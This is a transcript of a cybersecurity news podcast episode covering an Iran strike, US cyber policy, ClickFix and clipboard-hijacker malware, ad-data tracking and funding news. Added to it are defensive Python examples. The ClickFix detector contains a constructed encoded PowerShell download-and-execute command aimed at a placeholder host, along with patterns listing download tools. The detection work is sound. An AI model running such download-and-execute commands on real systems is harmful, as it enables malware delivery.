
From Tehran to the Apple II.
Israel claims a strike on Iran’s cyber warfare headquarters. The Trump administration releases a new national cyber strategy. DHS shakes up its IT and cybersecurity leadership. Velvet Tempest uses ClickFix to drop loaders and RATs. Researchers uncover a Linux cryptocurrency clipboard hijacker. The DOJ brings a Ghanaian romance scammer to justice. Online advertising enables government tracking. Monday business breakdown. Our guest is Jon France, CISO from ISC2, sharing some insights and findings from their 2025 ISC2 Cybersecurity Workforce Study. An Apple II app gets audited by AI.
Today is Monday March 9th 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
Israel claims a strike on Iran’s cyber warfare headquarters.
Israel says it struck a Tehran compound that allegedly housed Iran’s cyber warfare headquarters, the Intelligence Directorate, and other key military units, including elements of the Islamic Revolutionary Guard Corps (IRGC). The Israel Defense Forces announced the operation but provided few operational details beyond a digital illustration of the site. While the strike targeted facilities linked to Iran’s cyber operations, its actual impact on Tehran’s cyber capabilities remains unclear.
Threat intelligence monitoring suggests cyber activity tied to Iran has continued despite the attack. Analysts note that cyber operations often rely on distributed infrastructure and remote operators, meaning physical facilities are not always critical to ongoing campaigns. Additionally, a nationwide internet blackout in Iran following February 28 U.S.-Israeli strikes appears to have disrupted connectivity more than the destruction of the compound itself.
Security researchers warn that Iranian state-sponsored groups had already established access within regional networks before hostilities escalated. These pre-positioned capabilities, along with externally operated infrastructure, could allow operations to continue even while domestic connectivity is degraded.
The Trump administration releases a new national cyber strategy.
The Trump administration released a new national cyber strategy Friday that emphasizes stronger offensive cyber operations, protection of federal networks and critical infrastructure, streamlined regulations, and expanded use of emerging technologies like artificial intelligence and post-quantum cryptography. The document outlines six pillars, including shaping adversary behavior through both government and private-sector cyber capabilities, modernizing federal systems with zero-trust and advanced encryption, securing infrastructure and supply chains, and building a stronger cybersecurity workforce.
The strategy also promotes reducing regulatory burdens while encouraging coordination between government and industry. Separately, Trump signed an executive order directing agencies to prioritize prosecution of cybercrime and fraud, including efforts against foreign-backed criminal networks.
Industry groups broadly welcomed the strategy’s focus on deterrence, innovation, and regulatory reform, though some lawmakers criticized it as vague and lacking a detailed implementation plan. The White House said more detailed guidance will follow in future policy documents.
DHS shakes up its IT and cybersecurity leadership.
The Department of Homeland Security is undergoing a major shakeup in its IT and cybersecurity leadership, with multiple senior officials departing amid a broader reorganization. Chief Information Security Officer Hemant Baidwan is expected to leave later this month, following the February exit of Deputy CISO Amanda Day, who has joined Workday as vice president of cybersecurity and trust.
Sources say the changes are part of a wider realignment led by DHS Chief Information Officer Antoine McCord, aimed at consolidating IT leadership across the department’s component agencies under the central DHS CIO office. The effort reportedly includes placing headquarters personnel into key technology roles across agencies such as FEMA and CISA.
The leadership churn coincides with other high-level changes, including the departure of Homeland Security Secretary Kristi Noem. Some officials warn the upheaval could risk a “brain drain” at DHS during a period of heightened geopolitical tensions and cyber threats.
Velvet Tempest uses ClickFix to drop loaders and RATs.
The ransomware group Velvet Tempest is using the ClickFix social engineering technique and built-in Windows tools to deploy DonutLoader malware and the CastleRAT backdoor, according to researchers at MalBeacon. The activity was observed over 12 days in an emulated U.S. nonprofit network with more than 3,000 endpoints.
Attackers gained access through a malvertising campaign that presented a fake CAPTCHA and instructed victims to paste an obfuscated command into the Windows Run dialog. This command launched nested command-line processes that downloaded malware loaders, followed by PowerShell scripts used for reconnaissance, credential harvesting from Chrome, and staging additional payloads.
The intrusion ultimately deployed DonutLoader and retrieved CastleRAT, enabling persistent remote access. Although Velvet Tempest is known for deploying major ransomware strains such as Ryuk, REvil, Conti, and LockBit, researchers did not observe ransomware being executed in this case.
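The chain just described leaves a recognizable trace in process telemetry: explorer.exe, which services the Run dialog, spawning cmd.exe or powershell.exe with a hidden window, an execution-policy bypass and an encoded command that in turn downloads the next stage. As an added example, not taken from MalBeacon's report or the actors' tooling, the Python below triages constructed Sysmon-style process-creation records for that pattern and decodes the -EncodedCommand payload so the download-and-execute stage becomes visible. The record field names, the command lines and the host names in them are all assumptions constructed for this example.

```python
import base64
import re
from typing import Dict, List, Optional

# Interpreters a ClickFix lure typically has the victim launch from the Run dialog.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = {
    "encoded_command": ENC_RE,
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden|\bstart\s+/min\b"),
    "bypass_policy": re.compile(r"(?i)(?:^|\s)-e(?:xecution)?p(?:olicy)?\s+bypass"),
    "download_exec": re.compile(
        r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|"
        r"invoke-webrequest|curl|bitsadmin|certutil)\b"),
    "nested_shell": re.compile(r"(?i)\bcmd(?:\.exe)?\s+/c\b.*\b(?:cmd|powershell|mshta)\b"),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE)."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: Dict[str, object]) -> List[str]:
    """Return the indicator names that fire for one process-creation record."""
    parent = str(event["parent_image"]).rsplit("\\", 1)[-1].lower()
    child = str(event["image"]).rsplit("\\", 1)[-1].lower()
    cmdline = str(event["command_line"])
    reasons: List[str] = []
    # explorer.exe is the parent of anything started from the Run dialog.
    if parent == "explorer.exe" and child in SHELLS:
        reasons.append("shell_spawned_by_explorer")
    decoded = decode_encoded_command(cmdline)
    # Scan the visible command line and the decoded script together.
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons.extend(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return reasons


def is_clickfix_candidate(reasons: List[str]) -> bool:
    # A shell under explorer.exe is ordinary on its own (double-clicking a .bat
    # does it), so demand at least one evasion or download indicator as well.
    return "shell_spawned_by_explorer" in reasons and len(reasons) >= 2


def triage(events: List[Dict[str, object]]) -> List[tuple]:
    """(pid, reasons) for every record that looks like a ClickFix launch."""
    hits = []
    for event in events:
        reasons = analyze(event)
        if is_clickfix_candidate(reasons):
            hits.append((event["pid"], reasons))
    return hits


# Constructed stage-two script and Sysmon-style records; none of this is real telemetry.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/x')"
_ENC = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": f"cmd /c start /min powershell -w hidden -ep bypass -enc {_ENC}"},
    {"pid": 4188, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell -EncodedCommand {_ENC}"},
    {"pid": 812, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs -p"},
    {"pid": 5300, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd /c "C:\Users\alice\Desktop\build.bat"'},
    {"pid": 5412, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, reasons)
```

On a live host the same launch can be corroborated from the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what the user pasted. The rule deliberately ignores a shell under explorer.exe with no other indicator, since a user double-clicking a batch file produces exactly that tree.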
Researchers uncover a Linux cryptocurrency clipboard hijacker.
Researchers at Cyble Research and Intelligence Labs identified a new Linux malware strain called ClipXDaemon, an autonomous cryptocurrency clipboard hijacker that targets X11-based desktop environments. Its loader structure resembles one previously linked to ShadowHS activity, but the malware appears unrelated to that campaign; both likely used the same open-source bincrypter packer independently.
ClipXDaemon operates without command-and-control infrastructure or external communication. Instead, it monetizes victims by monitoring the system clipboard and replacing copied cryptocurrency wallet addresses with attacker-controlled ones. The malware targets multiple currencies, including Bitcoin and Ethereum.
The attack chain uses three stages: an encrypted loader, a memory-resident dropper, and a persistent on-disk ELF payload. It employs stealth techniques such as process masquerading and daemonization, and it runs only in X11 sessions, skipping Wayland, where a background process cannot read or set the clipboard without the compositor's cooperation. Researchers say the campaign reflects a shift toward autonomous, user-focused financial malware on Linux systems.
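The substitution only pays off if the replacement is a syntactically valid address of the same coin, so the user's wallet software accepts it without complaint; that constraint is also what a defender can check for. As an added example, not code from Cyble's report or from the malware, the Python below validates legacy Bitcoin addresses by their Base58Check checksum, recognizes Ethereum addresses by format, and flags the tell of an X11 clipboard swap: the CLIPBOARD selection changing from one valid address to a different valid address of the same coin while the selection owner changes, because a hijacker has to take selection ownership to replace the text. The addresses and clipboard snapshots are constructed for the example; bech32 (bc1...) addresses and EIP-55 checksum verification are out of scope here.

```python
import hashlib
import re
from typing import Dict, List, Optional

_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _checksum(payload: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def b58check_encode(payload: bytes) -> str:
    """Base58Check as used by legacy Bitcoin addresses (version byte + hash160)."""
    data = payload + _checksum(payload)
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, r = divmod(n, 58)
        digits = _B58[r] + digits
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + digits


def b58check_decode(text: str) -> Optional[bytes]:
    """Return the payload if the 4-byte checksum verifies, else None."""
    n = 0
    for ch in text:
        i = _B58.find(ch)
        if i < 0:
            return None
        n = n * 58 + i
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    raw = b"\x00" * (len(text) - len(text.lstrip("1"))) + body
    if len(raw) < 5 or _checksum(raw[:-4]) != raw[-4:]:
        return None
    return raw[:-4]


def classify_address(text: str) -> Optional[str]:
    """'btc' for a checksum-valid legacy P2PKH/P2SH address, 'eth' for a
    0x-prefixed 40-hex-digit address (format only), otherwise None."""
    text = text.strip()
    if re.fullmatch(r"0x[0-9a-fA-F]{40}", text):
        return "eth"
    if 26 <= len(text) <= 35 and text[0] in "13":
        payload = b58check_decode(text)
        if payload is not None and len(payload) == 21 and payload[0] in (0x00, 0x05):
            return "btc"
    return None


def detect_swaps(snapshots: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag transitions where CLIPBOARD moves from one valid address to a
    different valid address of the same coin and the X11 selection owner
    changes at the same time. Two different coins, or the same owner
    re-copying, do not fire."""
    alerts = []
    for prev, cur in zip(snapshots, snapshots[1:]):
        kind = classify_address(prev["content"])
        if (kind is not None and classify_address(cur["content"]) == kind
                and cur["content"] != prev["content"]
                and cur["owner"] != prev["owner"]):
            alerts.append({"coin": kind, "expected": prev["content"],
                           "pasted": cur["content"], "new_owner": cur["owner"]})
    return alerts


# Constructed addresses: version 0x00 plus an invented 20-byte hash160.
USER_BTC = b58check_encode(b"\x00" + b"\x11" * 20)
ATTACKER_BTC = b58check_encode(b"\x00" + b"\x22" * 20)
USER_ETH = "0x" + "11" * 20
ATTACKER_ETH = "0x" + "22" * 20

# Constructed clipboard snapshots; owner = the X11 client owning CLIPBOARD.
SAMPLE_SNAPSHOTS = [
    {"owner": "firefox", "content": "invoice #1042"},
    {"owner": "firefox", "content": USER_BTC},
    {"owner": "unnamed-client", "content": ATTACKER_BTC},   # a client the user never launched
    {"owner": "gnome-terminal", "content": USER_ETH},
    {"owner": "gnome-terminal", "content": USER_ETH},        # re-copied, unchanged: no alert
    {"owner": "unnamed-client", "content": ATTACKER_ETH},
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_SNAPSHOTS):
        print(alert)
```

The owner-change heuristic also fires when a user genuinely copies a second address from a different application, so a real monitor should pair it with the absence of a copy keystroke or a click in the new owner. The simplest user-side defence remains the one that needs no code: compare the first and last characters of the pasted address against the source before sending.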
The DOJ brings a Ghanaian romance scammer to justice.
A Ghanaian national, Derrick Van Yeboah, pleaded guilty to participating in a global fraud scheme involving romance scams and business email compromise (BEC), according to the U.S. Justice Department. The Ghana-based operation caused more than $100 million in losses, with about $10 million attributed to Van Yeboah. Prosecutors say he posed as romantic partners to gain victims’ trust and convince them to send money, and also impersonated business executives or suppliers in BEC scams to redirect corporate payments. He additionally helped launder proceeds from the fraud. Van Yeboah pleaded guilty to conspiracy to commit wire fraud, which carries a maximum 20-year prison sentence, and agreed to pay more than $10 million in restitution and forfeiture.
Online advertising enables government tracking.
New reporting shows U.S. Customs and Border Protection has used location data drawn from the online advertising ecosystem to track people’s phones without warrants. Documents obtained by 404 Media confirm the agency relied partly on data generated through real-time bidding (RTB), the advertising process that auctions ad space on websites and apps. RTB broadcasts user information such as device identifiers and location data to thousands of companies during ad auctions, allowing data brokers to collect and sell that information. Law enforcement agencies have purchased this data to track individuals’ movements, often bypassing traditional warrant requirements.
Privacy advocates warn the practice exposes how surveillance-based advertising systems can enable government monitoring. Experts urge stronger privacy laws, limits on precise location data in ad systems, and restrictions on the sale of sensitive data to authorities. Individuals can reduce exposure by disabling advertising IDs and limiting apps’ location permissions.
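The data RTB broadcasts travels in a structured bid request, and OpenRTB is the common format for it. As an added example, not drawn from the 404 Media documents, the Python below takes a constructed OpenRTB-style request, lists the fields that let any auction participant identify and locate the device, and then applies the two mitigations the story mentions: the device-level advertising-ID opt-out, which removes exactly one field, and sender-side limits on precise location and persistent identifiers. The field names (device.ifa, device.lmt, device.geo, user.buyeruid, app.bundle) are OpenRTB's; every value is invented for the example.

```python
import copy
import ipaddress
from typing import Any, Dict, List, Tuple

# The all-zero IFA that mobile platforms send once the user opts out of ad tracking.
ZERO_IFA = "00000000-0000-0000-0000-000000000000"

# Constructed OpenRTB-2.x-shaped bid request. Field names follow the OpenRTB
# object model; every value here is invented.
SAMPLE_BID_REQUEST: Dict[str, Any] = {
    "id": "req-7f3a",
    "imp": [{"id": "1", "banner": {"w": 320, "h": 50}}],
    "app": {"bundle": "com.example.weather", "name": "Example Weather"},
    "device": {
        "ifa": "5e0b1a2c-9d3f-4c6e-8a1b-0f2d7e9c4b13",
        "lmt": 0,
        "ip": "203.0.113.45",
        "ua": "Mozilla/5.0 (Linux; Android 14) ...",
        # geo.type 1 = coordinates from GPS / location services
        "geo": {"lat": 38.8977, "lon": -77.0365, "type": 1, "accuracy": 5,
                "country": "USA", "city": "Washington"},
    },
    "user": {"id": "u-91a7", "buyeruid": "dsp-4481"},
}


def tracking_signals(req: Dict[str, Any]) -> List[Tuple[str, str]]:
    """(path, value) for each field that lets a recipient identify or locate the device."""
    dev = req.get("device", {})
    geo = dev.get("geo", {})
    user = req.get("user", {})
    found: List[Tuple[str, str]] = []
    if dev.get("ifa") and dev["ifa"] != ZERO_IFA and not dev.get("lmt"):
        found.append(("device.ifa", dev["ifa"]))
    if "lat" in geo and "lon" in geo:
        found.append(("device.geo", f"{geo['lat']},{geo['lon']} type={geo.get('type')}"))
    if dev.get("ip"):
        found.append(("device.ip", dev["ip"]))
    for key in ("id", "buyeruid"):
        if user.get(key):
            found.append((f"user.{key}", user[key]))
    if req.get("app", {}).get("bundle"):
        found.append(("app.bundle", req["app"]["bundle"]))
    return found


def opt_out_ad_id(req: Dict[str, Any]) -> Dict[str, Any]:
    """What the device-level 'limit ad tracking' toggle changes, and nothing more."""
    out = copy.deepcopy(req)
    out.setdefault("device", {}).update({"lmt": 1, "ifa": ZERO_IFA})
    return out


def _truncate_ip(ip: str) -> str:
    """Coarsen to /24 (IPv4) or /48 (IPv6) so the address no longer names one host."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False).network_address)


def minimize(req: Dict[str, Any]) -> Dict[str, Any]:
    """Sender-side limits: honour lmt, strip precise coordinates, coarsen the
    IP, and drop persistent user identifiers before the request is broadcast."""
    out = copy.deepcopy(req)
    dev = out.setdefault("device", {})
    if dev.get("lmt"):
        dev["ifa"] = ZERO_IFA
    geo = dev.get("geo")
    if geo:
        for key in ("lat", "lon", "accuracy", "type"):
            geo.pop(key, None)  # keep only country/region/city
    if dev.get("ip"):
        dev["ip"] = _truncate_ip(dev["ip"])
    user = out.get("user", {})
    user.pop("id", None)
    user.pop("buyeruid", None)
    return out


if __name__ == "__main__":
    for label, req in [("as sent", SAMPLE_BID_REQUEST),
                       ("user opted out", opt_out_ad_id(SAMPLE_BID_REQUEST)),
                       ("sender minimized", minimize(SAMPLE_BID_REQUEST)),
                       ("both", minimize(opt_out_ad_id(SAMPLE_BID_REQUEST)))]:
        print(label, tracking_signals(req))
```

With the advertising ID zeroed, GPS coordinates, the full IP address, the app bundle and the exchange-side user IDs still leave with every auction, which is why the experts in the story push for limits inside the ad systems rather than relying on the device toggle alone; only the combination of both layers shrinks the request to a coarse network and an app name.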
Monday business breakdown.
Several cybersecurity startups announced major funding rounds as investors continue backing AI-driven security platforms and resilience technologies. UpGuard raised $75 million in a Series C round to expand its AI-powered cyber risk posture management platform and pursue acquisitions. Israeli firms Gambit Security and Fig Security emerged from stealth with $61 million and $38 million respectively to develop cyber resilience and SecOps platforms. JetStream Security launched with $34 million for AI governance and security tools, while ThreatAware secured $25 million to expand its cyber asset management platform. ArmorCode raised $16 million to advance its AI exposure management platform, and Secfix obtained $12 million to grow its compliance automation services.
In mergers and acquisitions, Zurich Insurance Group plans to acquire UK cyber insurer Beazley for about $11 billion to expand cyber risk coverage. Other deals include Ekco acquiring OT security firm Datalogix, Myriad360 buying technology provider Advizex, and Bastion Security Group acquiring Australian security engineering firm Astralas.
An Apple II app gets audited by AI.
Microsoft Azure CTO Mark Russinovich recently decided to revisit a piece of his own programming history, a small Apple II utility he wrote in 1986, and gave it a modern audit courtesy of AI. The program, called Enhancer, was written in 6502 machine code to extend Applesoft BASIC with more flexible GOTO and GOSUB commands.
Enter Claude Opus 4.6, which promptly decompiled the four-decade-old code and spotted several flaws, including a subtle bug where the program quietly misbehaved instead of throwing an error when a destination line wasn’t found. The fix, in hindsight, was simple: check the carry flag.
The discovery is mostly nostalgic trivia for Apple II enthusiasts, but it highlights a broader shift. Modern AI systems can now analyze low-level code and uncover vulnerabilities in software that humans may not have examined for decades. That capability could help defenders patch old systems, though it also gives attackers a powerful new way to hunt for bugs lurking in the world’s vast supply of aging firmware and legacy code.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
Don’t forget to check out the “Grumpy Old Geeks” podcast, where I contribute to a regular segment on Jason and Brian’s show every week. You can find “Grumpy Old Geeks” where all the fine podcasts are listed.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com
We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry. Learn how at n2k.com.
N2K’s lead producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.
